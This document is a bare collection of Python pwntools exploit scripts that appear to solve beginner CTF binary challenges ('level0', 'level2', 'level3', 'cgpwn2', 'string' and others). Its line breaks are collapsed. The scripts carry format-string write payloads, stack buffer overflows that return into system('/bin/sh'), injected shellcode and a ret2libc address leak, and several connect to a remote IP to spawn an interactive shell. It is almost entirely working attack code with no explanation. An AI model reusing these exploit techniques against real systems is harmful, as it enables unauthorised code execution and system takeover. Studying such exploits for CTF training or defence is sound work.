%10$n
。from pwn import * context.log_level = 'debug' DEBUG = int(sys.argv[1]) if DEBUG == 1: p = process('./cgfsb') else: p = remote('111.198.29.45',58350) pwnme_addr = 0x0804A068 payload1 = "aaaa" payload2 = p32(pwnme_addr) + 'aaaa%10$n' p.recvuntil('please tell me your name:\n') p.sendline(payload1) p.recvuntil('leave your message please:\n') p.sendline(payload2) print p.recv() print p.recv()
from pwn import * p=remote(ip,port) p.sendafter('Your Birth?',str(0)+'\n') p.sendafter(' Your Name?','a'*8+p64(1926)) p.interactive()
from pwn import * p = process("./637f5c201bf94c128c8c22e4d6e9cef3") p.sendline('a'*4+p32(1853186401)) p.interactive()
from pwn import * p = remote('111.198.29.45',54531) elf = ELF("./level0") sysaddr = elf.symbols['callsystem'] payload = 'a'*(0x80 + 8) + p64(sysaddr) p.recv() p.send(payload) p.interactive()
from pwn import * elf = ELF('./level2') sys_addr = elf.symbols['system'] sh_addr = elf.search('/bin/sh').next() payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr) #io = remote('111.198.29.45',40579) io = process("./level2") io.sendlineafter("Input:\n",payload) io.interactive() io.close()
from pwn import * from ctypes import * elf = ELF('./guess') libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6") io = process('./guess') #io = remote("111.198.29.45",58174) payload = 32 * 'a' + p64(1) io.sendafter("Your name:", payload) libc.srand(1) for i in range(10): num = str(libc.rand()%6+1) print num+" ", io.interactive()
from pwn import * elf = ELF('./cgpwn2') io = process('./cgpwn2') #io = remote("111.198.29.45",58174) payload = 42 * 'a' + p32(elf.symbols['system']) + p32(0xdeadbeef) + p32(0x0804A080) shstr = "/bin/sh" io.recvuntil("name") io.sendline(shstr) io.recvuntil("here:") io.sendline(payload) io.interactive()
from pwn import * elf = ELF('./intover') io = process('./intover') #io = remote("111.198.29.45",51548) io.recvuntil("choice:") io.sendline('1') io.recvuntil("username:") io.sendline("aaa") io.recvuntil("passwd") io.sendline('a'*0x14 + 'a'*4 + p32(elf.symbols['what_is_this']) + 0xea*'a') io.interactive()
from pwn import * #io = remote('111.198.29.45','41410') io = process("./string") io.recvuntil("secret[0] is ") v3_0_addr = int(io.recvuntil("\n")[:-1], 16) io.recvuntil("character's name be:") io.sendline("tiumo") io.recvuntil("east or up?:") io.sendline("east") io.recvuntil("there(1), or leave(0)?:") io.sendline("1") io.recvuntil("'Give me an address'") io.sendline(str(v3_0_addr)) io.recvuntil("you wish is:") io.sendline("%85c%7$n") context(log_level = 'debug', arch = 'amd64', os = 'linux') shellcode=asm(shellcraft.sh()) io.recvuntil("USE YOU SPELL") io.sendline(shellcode) io.interactive()
#-*-coding:utf-8-*- from pwn import * #io = process('./level3') io = remote('111.198.29.45',55186) elf = ELF('./level3') libc = ELF('./libc_32.so.6') write_plt = elf.plt['write'] vul_addr = elf.symbols['vulnerable_function'] got_addr = elf.got['write'] payload1="a"*0x88 + 'aaaa' + p32(write_plt) + p32(vul_addr) + p32(1) + p32(got_addr) + p32(4) io.recvuntil("Input:\n") io.sendline(payload1) write_addr = u32(io.recv(4)) print write_addr libc_write = libc.symbols['write'] libc_system = libc.symbols['system'] libc_sh = libc.search('/bin/sh').next() system_addr = write_addr + (libc_system-libc_write) #用相對地址計算真實地址 sh_addr = write_addr + (libc_sh-libc_write) payload2 = 'a'*0x88 + 'aaaa' + p32(system_addr) + 'aaaa' + p32(sh_addr) io.recvuntil("Input:\n") io.sendline(payload2) io.interactive()